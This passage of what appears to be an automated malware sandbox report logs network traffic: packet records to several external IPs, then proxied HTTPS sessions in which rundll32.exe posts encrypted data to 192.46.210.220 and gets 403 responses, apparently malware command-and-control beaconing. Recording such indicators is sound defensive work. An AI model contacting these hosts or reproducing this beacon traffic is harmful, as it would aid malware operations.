Oct 28, 2021 05:12:12.548872948 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:12.714190006 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:12.714271069 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:12.714410067 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:12.715045929 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:12.720278978 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:12.720444918 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:12.885662079 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:12.885689974 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:12.922894001 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:13.268460035 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:13.268486977 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:13.269531965 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:13.273544073 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:13.439177990 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:14.298856974 CEST	49809	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:14.356509924 CEST	8116	49809	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:14.356678009 CEST	49809	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:14.357232094 CEST	49809	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:14.414581060 CEST	8116	49809	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:14.414736032 CEST	8116	49809	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:14.425091982 CEST	49809	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:14.426439047 CEST	49809	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:14.433299065 CEST	49809	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:14.433470011 CEST	49809	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:14.490919113 CEST	8116	49809	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:14.491540909 CEST	8116	49809	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:14.678611994 CEST	8116	49809	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:14.678641081 CEST	8116	49809	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:14.678711891 CEST	49809	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:14.681731939 CEST	49809	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:14.739299059 CEST	8116	49809	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:15.861663103 CEST	49810	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:15.861705065 CEST	443	49810	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:15.861798048 CEST	49810	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:15.862426043 CEST	49810	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:15.862451077 CEST	443	49810	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:16.357211113 CEST	443	49810	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:16.358788013 CEST	49810	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:16.362092972 CEST	49810	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:16.362118959 CEST	443	49810	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:16.366799116 CEST	49810	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:16.366822958 CEST	443	49810	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:16.366884947 CEST	49810	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:16.366894960 CEST	443	49810	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:17.057781935 CEST	443	49810	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:17.057851076 CEST	443	49810	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:17.058579922 CEST	49810	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:17.063792944 CEST	49810	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:17.063831091 CEST	443	49810	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:18.113224030 CEST	49811	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:18.283437014 CEST	808	49811	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:18.284352064 CEST	49811	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:18.285913944 CEST	49811	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:18.456001043 CEST	808	49811	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:18.456233978 CEST	808	49811	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:18.458410978 CEST	49811	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:18.460557938 CEST	49811	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:18.464159012 CEST	49811	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:18.464240074 CEST	49811	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:18.630546093 CEST	808	49811	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:18.634147882 CEST	808	49811	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:18.634172916 CEST	808	49811	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:18.634181976 CEST	808	49811	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:19.012696028 CEST	808	49811	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:19.012722015 CEST	808	49811	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:19.012882948 CEST	49811	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:19.015561104 CEST	49811	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:19.185993910 CEST	808	49811	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:20.047868013 CEST	49813	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:20.214302063 CEST	6891	49813	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:20.214405060 CEST	49813	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:20.214963913 CEST	49813	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:20.381210089 CEST	6891	49813	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:20.381452084 CEST	6891	49813	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:20.381582975 CEST	49813	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:20.382180929 CEST	49813	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:20.387788057 CEST	49813	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:20.387927055 CEST	49813	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:20.554205894 CEST	6891	49813	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:20.554229975 CEST	6891	49813	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:20.554236889 CEST	6891	49813	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:20.936764956 CEST	6891	49813	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:20.936788082 CEST	6891	49813	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:20.936923027 CEST	49813	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:20.936980009 CEST	49813	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:20.941267967 CEST	49813	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:21.107656002 CEST	6891	49813	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:22.057666063 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:22.116748095 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:22.116959095 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:22.273242950 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:22.332420111 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:22.332617998 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:22.332679987 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:22.333528996 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:22.338943958 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:22.339406013 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:22.398046017 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:22.398325920 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:22.625324965 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:22.625349045 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:22.625428915 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:22.625483036 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:22.628608942 CEST	49820	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:22.687516928 CEST	8116	49820	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:23.751923084 CEST	49823	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:23.751991034 CEST	443	49823	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:23.752084970 CEST	49823	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:23.752737045 CEST	49823	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:23.752757072 CEST	443	49823	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:24.274296045 CEST	443	49823	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:24.278136969 CEST	49823	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:24.311440945 CEST	49823	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:24.311467886 CEST	443	49823	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:24.315684080 CEST	49823	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:24.315709114 CEST	443	49823	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:24.315829992 CEST	49823	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:24.315840006 CEST	443	49823	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:25.021106958 CEST	443	49823	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:25.021239042 CEST	443	49823	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:25.021262884 CEST	49823	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:25.021322012 CEST	49823	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:25.599236012 CEST	49823	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:25.599276066 CEST	443	49823	192.46.210.220	192.168.2.3

HTTP Request Dependency Graph

192.46.210.220

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:09 UTC	0	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:09 UTC	0	OUT	Data Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:10 UTC	4	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:10 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49744	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:12 UTC	4	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:12 UTC	5	OUT	Data Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:12 UTC	9	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:12 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49786	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:51 UTC	49	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:51 UTC	49	OUT	Data Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:51 UTC	54	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49787	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:52 UTC	54	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:52 UTC	54	OUT	Data Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:53 UTC	59	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:52 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49799	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:58 UTC	59	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:58 UTC	59	OUT	Data Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:11:59 UTC	64	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:11:59 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49800	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:11:59 UTC	64	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:11:59 UTC	64	OUT	Data Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:12:00 UTC	69	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:12:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49806	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:12:08 UTC	69	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:12:08 UTC	69	OUT	Data Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:12:09 UTC	73	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:12:09 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49810	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:12:16 UTC	74	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:12:16 UTC	74	OUT	Data Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:12:17 UTC	78	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:12:16 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49823	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:12:24 UTC	79	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:12:24 UTC	79	OUT	Data Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:12:25 UTC	83	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:12:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
